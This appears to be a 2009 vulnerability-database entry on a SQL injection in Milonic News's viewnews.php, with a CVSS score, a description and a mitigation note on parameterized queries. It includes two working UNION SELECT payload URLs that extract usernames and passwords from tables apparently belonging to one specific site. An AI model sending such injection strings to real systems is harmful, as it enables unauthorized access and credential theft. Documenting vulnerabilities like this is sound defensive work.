vendor:
News (viewnews)
by:
Err0R
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: News (viewnews)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Milonic News (viewnews) SQL Injection Vulnerability
An attacker can exploit a SQL injection vulnerability in Milonic News (viewnews) to gain access to the username and password of the website. The exploit is done by sending a crafted URL to the vulnerable application. The URL contains a malicious SQL query that can be used to extract data from the database. The URL for the exploit is /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14+from+renewabl_mhpcompanies.experts-- for username and /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14+from+renewabl_mhpwebsite.users-- for password.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.